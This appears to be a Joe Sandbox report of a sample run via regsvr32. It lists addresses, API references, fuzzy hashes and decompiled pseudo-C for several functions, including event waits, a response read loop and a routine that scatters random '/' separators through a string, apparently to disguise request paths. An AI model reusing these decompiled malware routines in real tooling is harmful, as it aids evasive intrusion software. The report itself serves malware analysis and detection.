                                                  0x00c810be
                                                  0x00c810c0
                                                  0x00c810c2
                                                  0x00c810c4
                                                  0x00c810ce
                                                  0x00c810d3
                                                  0x00c810d5
                                                  0x00c810d7
                                                  0x00c810d8
                                                  0x00c810d9
                                                  0x00c810da
                                                  0x00c810e1
                                                  0x00c810e8
                                                  0x00c810eb
                                                  0x00c810eb
                                                  0x00c810b8
                                                  0x00c810b8
                                                  0x00c810b8
                                                  0x00c810f3
                                                  0x00c810fb
                                                  0x00c81104
                                                  0x00c81109
                                                  0x00c81109
                                                  0x00c8110e
                                                  0x00000000
                                                  0x00000000
                                                  0x00c81110
                                                  0x00c81113
                                                  0x00c8111d
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8111f
                                                  0x00c8111f
                                                  0x00c81129
                                                  0x00c81109
                                                  0x00c8110e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8110e
                                                  0x00c81133
                                                  0x00c81136
                                                  0x00c81139
                                                  0x00c81140
                                                  0x00c81140
                                                  0x00c8114d
                                                  0x00000000
                                                  0x00c8114d
                                                  0x00c81048
                                                  0x00c8104c
                                                  0x00c8104d
                                                  0x00c8104f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8104f
                                                  0x00000000

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00C810C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00C810DA
                                                  • memset.NTDLL ref: 00C8117A
                                                  • memset.NTDLL ref: 00C8118A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: 432940a5984adbf30e27b55e5f9534f3a8dd84ff5a68b4a8cb66347a2530e863
                                                  • Instruction ID: d61d60a53cf2cb9b65b5a1c92d3288c8a8df3cdc01e33be7125d64757fbf8cc0
                                                  • Opcode Fuzzy Hash: 432940a5984adbf30e27b55e5f9534f3a8dd84ff5a68b4a8cb66347a2530e863
                                                  • Instruction Fuzzy Hash: B741E771600249AFDB10FFA8CC45BEE77B8EF44714F048529F91AA7181DB70AE49DB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8A9AB, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 00C8A9BD
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • ResetEvent.KERNEL32(?), ref: 00C8AA31
                                                  • GetLastError.KERNEL32 ref: 00C8AA54
                                                  • GetLastError.KERNEL32 ref: 00C8AAFF
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 35ded7ad7d6b2513be95ecdffe208b12ade6335e94290c972a9cd60d4fc70e94
                                                  • Instruction ID: 9d460394a716aba94811c69613b8a2e2d9886872fad810d28ff6c48971f6d185
                                                  • Opcode Fuzzy Hash: 35ded7ad7d6b2513be95ecdffe208b12ade6335e94290c972a9cd60d4fc70e94
                                                  • Instruction Fuzzy Hash: AA418E71500204BBE724AFA5DC88FAF7BBDEF49748F10492AF153D14A0E7719A44EB29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C839BF, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E00C839BF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0xc8d134() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0xc8d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E00C82049(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0xc8d134() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E00C89039(_v16);
							if(_t58 == 0) {
								_t58 = E00C87A07(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E00C81C47( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E00C81C47( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                                  0x00c839bf
                                                  0x00c839ce
                                                  0x00c839d3
                                                  0x00c839d5
                                                  0x00c839da
                                                  0x00c839db
                                                  0x00c839e0
                                                  0x00c839e1
                                                  0x00c839ec
                                                  0x00c83a1d
                                                  0x00c83a22
                                                  0x00c83ae5
                                                  0x00c83ae8
                                                  0x00c83aee
                                                  0x00c83aee
                                                  0x00c83a2f
                                                  0x00c83a37
                                                  0x00c83ae2
                                                  0x00000000
                                                  0x00c83ae2
                                                  0x00c83a42
                                                  0x00c83a49
                                                  0x00c83a4c
                                                  0x00c83ad4
                                                  0x00c83ad5
                                                  0x00c83ad5
                                                  0x00c83adb
                                                  0x00000000
                                                  0x00c83adb
                                                  0x00c83a52
                                                  0x00c83a54
                                                  0x00c83a5a
                                                  0x00c83a5b
                                                  0x00c83a5b
                                                  0x00c83a5e
                                                  0x00c83a61
                                                  0x00c83a67
                                                  0x00c83a6c
                                                  0x00c83a6d
                                                  0x00c83a72
                                                  0x00c83a75
                                                  0x00c83a80
                                                  0x00000000
                                                  0x00000000
                                                  0x00c83a88
                                                  0x00c83a90
                                                  0x00c83ab9
                                                  0x00c83abc
                                                  0x00c83ac3
                                                  0x00c83ace
                                                  0x00c83ace
                                                  0x00000000
                                                  0x00c83ac3
                                                  0x00c83a9c
                                                  0x00c83aa0
                                                  0x00000000
                                                  0x00000000
                                                  0x00c83aa2
                                                  0x00c83aa7
                                                  0x00000000
                                                  0x00000000
                                                  0x00c83aa9
                                                  0x00c83aa9
                                                  0x00c83aae
                                                  0x00000000
                                                  0x00000000
                                                  0x00c83ab0
                                                  0x00c83ab1
                                                  0x00c83ab4
                                                  0x00c83ab4
                                                  0x00c83a5b
                                                  0x00c839f4
                                                  0x00c839fc
                                                  0x00c83a15
                                                  0x00c83a17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c83a17
                                                  0x00c83a08
                                                  0x00c83a0c
                                                  0x00000000
                                                  0x00000000
                                                  0x00c83a12
                                                  0x00000000

                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 00C839D5
                                                  • GetLastError.KERNEL32 ref: 00C839EE
                                                    • Part of subcall function 00C81C47: WaitForMultipleObjects.KERNEL32(00000002,00C8AA72,00000000,00C8AA72,?,?,?,00C8AA72,0000EA60), ref: 00C81C62
                                                  • ResetEvent.KERNEL32(?), ref: 00C83A67
                                                  • GetLastError.KERNEL32 ref: 00C83A82
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: f0d0e196208624a1793a53009617e35c0259756be04702d8544110ed08a420f2
                                                  • Instruction ID: 5031b99f451327dbfa11d2d89d77c78d53ed4dcdfab3bb2dff4272335df88bca
                                                  • Opcode Fuzzy Hash: f0d0e196208624a1793a53009617e35c0259756be04702d8544110ed08a420f2
                                                  • Instruction Fuzzy Hash: C131C632600244BBCB15EBE5CC44BAE77B9AF84B68F240528E566E7190E731EB41A714
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C842EA, Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E00C842EA(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xc8d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xc8d27c; // 0x41a5a8
				_t3 = _t8 + 0xc8e862; // 0x61636f4c
				_t25 = 0;
				_t30 = E00C87A9A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xc8d2a8, 1, 0, _t30);
					E00C89039(_t30);
				}
				_t12 =  *0xc8d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00C8757F() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00C8205E(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0xc8d0f0( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00C8A501(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                                                  0x00c842eb
                                                  0x00c842f2
                                                  0x00c842fc
                                                  0x00c84300
                                                  0x00c84306
                                                  0x00c84315
                                                  0x00c8431c
                                                  0x00c84320
                                                  0x00c84332
                                                  0x00c84334
                                                  0x00c84334
                                                  0x00c84339
                                                  0x00c84340
                                                  0x00c84395
                                                  0x00c84395
                                                  0x00c8439b
                                                  0x00c8439d
                                                  0x00c8439d
                                                  0x00c843a7
                                                  0x00c843ab
                                                  0x00c843bd
                                                  0x00c843bd
                                                  0x00c843c1
                                                  0x00c843c7
                                                  0x00c843c7
                                                  0x00000000
                                                  0x00c84359
                                                  0x00c8435e
                                                  0x00c84366
                                                  0x00c84368
                                                  0x00c8436c
                                                  0x00c8436c
                                                  0x00c84379
                                                  0x00c8437d
                                                  0x00c84381
                                                  0x00c843d6
                                                  0x00c843dc
                                                  0x00c843dc
                                                  0x00c8438f
                                                  0x00c84393
                                                  0x00c843ca
                                                  0x00c843cc
                                                  0x00c843cf
                                                  0x00c843cf
                                                  0x00000000
                                                  0x00c843cc
                                                  0x00c84393
                                                  0x00000000
                                                  0x00c8437d

                                                  APIs
                                                    • Part of subcall function 00C87A9A: lstrlen.KERNEL32(00C823E9,00000000,00000000,00000027,00000005,00000000,00000000,00C896DA,74666F53,00000000,00C823E9,00C8D00C,?,00C823E9), ref: 00C87AD0
                                                    • Part of subcall function 00C87A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 00C87AF4
                                                    • Part of subcall function 00C87A9A: lstrcat.KERNEL32(00000000,00000000), ref: 00C87AFC
                                                  • CreateEventA.KERNEL32(00C8D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00C83CA0,?,00000001,?), ref: 00C8432B
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,00C83CA0,00000000,00000000,?,00000000,?,00C83CA0,?,00000001,?,?,?,?,00C86880), ref: 00C84389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00C83CA0,?,00000001,?), ref: 00C843B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00C83CA0,?,00000001,?,?,?,?,00C86880), ref: 00C843CF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 62fd7e75a0eb83688354d7b18f1d7335e1f7a99e131f8893471513dfdd96c3d7
                                                  • Instruction ID: fcb55bbf2d96e13b7ebdc45b55e36a22a690f3daa8ed408b212ca1e5cf9ff4e3
                                                  • Opcode Fuzzy Hash: 62fd7e75a0eb83688354d7b18f1d7335e1f7a99e131f8893471513dfdd96c3d7
                                                  • Instruction Fuzzy Hash: 3A214632500302ABC7357FA89C88B6FB7A8EB88758F150225F972DB160E770DD01879C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8A0B2, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 38%
                                                  			E00C8A0B2(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0xc8d144; // 0xc8ad81
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E00C82049(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E00C89039(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E00C81C47( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                  0x00c8a0b2
                                                  0x00c8a0b2
                                                  0x00c8a0bc
                                                  0x00c8a0c2
                                                  0x00c8a0c5
                                                  0x00c8a0c9
                                                  0x00c8a0d1
                                                  0x00c8a0d4
                                                  0x00c8a0ed
                                                  0x00c8a0f0
                                                  0x00c8a0f4
                                                  0x00c8a0f8
                                                  0x00c8a0f9
                                                  0x00c8a0fe
                                                  0x00c8a101
                                                  0x00c8a108
                                                  0x00c8a10f
                                                  0x00c8a162
                                                  0x00c8a16b
                                                  0x00c8a16e
                                                  0x00c8a1a9
                                                  0x00c8a1af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8a16e
                                                  0x00c8a115
                                                  0x00000000
                                                  0x00c8a11c
                                                  0x00c8a12a
                                                  0x00c8a12d
                                                  0x00c8a130
                                                  0x00c8a13c
                                                  0x00c8a140
                                                  0x00c8a1a2
                                                  0x00c8a142
                                                  0x00c8a145
                                                  0x00c8a149
                                                  0x00c8a14a
                                                  0x00c8a14b
                                                  0x00c8a14d
                                                  0x00c8a154
                                                  0x00c8a192
                                                  0x00c8a19d
                                                  0x00c8a156
                                                  0x00c8a159
                                                  0x00c8a15d
                                                  0x00c8a15d
                                                  0x00c8a154
                                                  0x00000000
                                                  0x00c8a140
                                                  0x00c8a115
                                                  0x00c8a0d9
                                                  0x00c8a0df
                                                  0x00c8a0e4
                                                  0x00c8a0e7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8a177
                                                  0x00c8a17f
                                                  0x00c8a186
                                                  0x00c8a186
                                                  0x00000000

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 00C8A0C9
                                                  • SetEvent.KERNEL32(?), ref: 00C8A0D9
                                                  • GetLastError.KERNEL32 ref: 00C8A162
                                                    • Part of subcall function 00C81C47: WaitForMultipleObjects.KERNEL32(00000002,00C8AA72,00000000,00C8AA72,?,?,?,00C8AA72,0000EA60), ref: 00C81C62
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  • GetLastError.KERNEL32(00000000), ref: 00C8A197
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: e88ce6c20352dcce49ddf7f79c1046aca38273b17e52eadb1a41789e6b563822
                                                  • Instruction ID: 8f3dcd410e30d0d9e3ff458e49eaa679bfc5d0373cbad549b8f6f72c0fa745ec
                                                  • Opcode Fuzzy Hash: e88ce6c20352dcce49ddf7f79c1046aca38273b17e52eadb1a41789e6b563822
                                                  • Instruction Fuzzy Hash: 32310BB5900608EFEB20EFA5CCC4AAEBBB8EB04344F10497AE552E2551D730AA449B25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C83BF1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 40%
                                                  			E00C83BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00C89763(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00C8A022(_t23);
						}
					}
					return _t38;
				}
				if(E00C8A72D(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xc8d2a8, 1, 0,  *0xc8d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00C88A51(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00C817D5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00C81F99(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00C842EA( &_v32, _t39);
					goto L13;
				}
			}












                                                  0x00c83bf1
                                                  0x00c83bfe
                                                  0x00c83c04
                                                  0x00c83c05
                                                  0x00c83c06
                                                  0x00c83c07
                                                  0x00c83c08
                                                  0x00c83c0c
                                                  0x00c83c18
                                                  0x00c83c1c
                                                  0x00c83ca4
                                                  0x00c83ca4
                                                  0x00c83ca7
                                                  0x00c83ca9
                                                  0x00c83cb1
                                                  0x00c83cb1
                                                  0x00c83cb7
                                                  0x00c83cba
                                                  0x00c83cba
                                                  0x00c83cb7
                                                  0x00c83cc5
                                                  0x00c83cc5
                                                  0x00c83c2f
                                                  0x00c83c31
                                                  0x00c83c31
                                                  0x00c83c48
                                                  0x00c83c4c
                                                  0x00c83c4f
                                                  0x00c83c5a
                                                  0x00c83c61
                                                  0x00c83c61
                                                  0x00c83c6d
                                                  0x00c83c6e
                                                  0x00c83c7c
                                                  0x00c83c70
                                                  0x00c83c70
                                                  0x00c83c71
                                                  0x00c83c72
                                                  0x00c83c73
                                                  0x00c83c74
                                                  0x00c83c75
                                                  0x00c83c75
                                                  0x00c83c81
                                                  0x00c83c86
                                                  0x00c83c88
                                                  0x00c83c8a
                                                  0x00c83c8a
                                                  0x00c83c91
                                                  0x00000000
                                                  0x00c83c93
                                                  0x00c83c93
                                                  0x00c83ca0
                                                  0x00000000
                                                  0x00c83ca0

                                                  APIs
                                                  • CreateEventA.KERNEL32(00C8D2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,00C86880,?,00000001,?), ref: 00C83C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,00C86880,?,00000001,?,00000002,?,?,00C82417,?), ref: 00C83C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,00C86880,?,00000001,?,00000002,?,?,00C82417,?), ref: 00C83C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00C86880,?,00000001,?,00000002,?,?,00C82417,?), ref: 00C83C61
                                                    • Part of subcall function 00C88A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,00C83C81,?,00C83C81,?,?,?,?,?,00C83C81,?), ref: 00C88B2B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: 127f8d49c095f678e9310d36df0cd680961dd58e8e921034faf037a15d71c5cb
                                                  • Instruction ID: bfed032993ac6cf98cade2d7e45af1a526fa70633508b997d47e4488c9195a13
                                                  • Opcode Fuzzy Hash: 127f8d49c095f678e9310d36df0cd680961dd58e8e921034faf037a15d71c5cb
                                                  • Instruction Fuzzy Hash: 0C21D472D00259ABCB10BFE488C59EEB3BDAF44798B054529FA22F7140D730DF459BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8788B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E00C8788B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xc8d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xc8d250; // 0xf9541ad9
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xc8d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                  0x00c87893
                                                  0x00c87896
                                                  0x00c8789c
                                                  0x00c878b4
                                                  0x00c878b8
                                                  0x00c878bb
                                                  0x00c878bd
                                                  0x00c878c0
                                                  0x00c878c2
                                                  0x00c878c5
                                                  0x00c878c7
                                                  0x00c878c7
                                                  0x00c878c9
                                                  0x00c878d4
                                                  0x00c878d9
                                                  0x00c878ea
                                                  0x00c878f2
                                                  0x00c878f7
                                                  0x00c878fa
                                                  0x00c878fd
                                                  0x00c878ff
                                                  0x00c87905
                                                  0x00c87908
                                                  0x00c87908
                                                  0x00c87908
                                                  0x00c87913
                                                  0x00c87918
                                                  0x00c87922

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00C8839A,00000000,?,?,00C8A428,?,010A95B0), ref: 00C87896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00C878AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00C8839A,00000000,?,?,00C8A428,?,010A95B0), ref: 00C878F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 00C87913
                                                  Memory Dump Source
